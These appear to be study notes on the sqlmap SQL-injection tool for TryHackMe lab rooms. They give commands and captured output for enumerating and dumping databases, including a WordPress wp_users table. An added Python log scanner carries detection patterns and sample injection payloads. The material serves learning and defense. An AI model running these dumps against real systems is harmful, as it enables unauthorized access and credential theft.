sqlmap: Notes

sqlmap is an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers.

apt install sqlmap
sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite
sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQLite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump 

List all databases

# sqlmap -u http://10.10.200.148/users/login.php --forms --batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php --forms --batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Example: Dump data from the wp_users table of the wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch
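
Seen from the defending side, runs like the ones above leave traces in web server logs: sqlmap sends a User-Agent beginning with "sqlmap/" unless told otherwise, and the space2comment tamper script replaces spaces with /**/. The following is an added example, not part of the original notes; the log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache combined log format (not taken from the page).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Dec/2020:19:05:22 +0000] "POST /users/login.php HTTP/1.1" 200 512 "-" "sqlmap/1.4.11#stable (http://sqlmap.org)"
198.51.100.7 - - [05/Dec/2020:19:05:23 +0000] "GET /item.php?id=1%2F%2A%2A%2FAND%2F%2A%2A%2F1%3D1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Dec/2020:19:06:01 +0000] "GET /item.php?id=2 HTTP/1.1" 200 690 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Dec/2020:19:06:04 +0000] "GET /search.php?q=a+UNION+ALL+SELECT+NULL%2CNULL--+- HTTP/1.1" 200 801 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

SEP = r"(?:\s|/\*\*/)+"  # whitespace or the /**/ that space2comment substitutes

# Hypothetical rule names; each rule takes the URL-decoded target and the User-Agent.
RULES = {
    "sqlmap-user-agent": lambda target, ua: ua.lower().startswith("sqlmap/"),
    "comment-as-space": lambda target, ua: bool(re.search(r"\w/\*\*/\w", target)),
    "union-select": lambda target, ua: bool(
        re.search(rf"\bunion{SEP}(?:all{SEP})?select\b", target, re.I)
    ),
}


def scan(log_text):
    """Return (ip, rule_name) for every rule that fires on every parsable line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        target = unquote_plus(m["target"])  # decode %2F%2A%2A%2F -> /**/
        for name, rule in RULES.items():
            if rule(target, m["ua"]):
                hits.append((m["ip"], name))
    return hits


if __name__ == "__main__":
    for ip, name in scan(SAMPLE_LOG):
        print(f"{ip}\t{name}")
```

Access logs do not record POST bodies, so form submissions such as the login.php runs above are only matched here by the User-Agent rule; applying the payload rules to them needs body inspection at a WAF or in application logging.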

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advent of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101
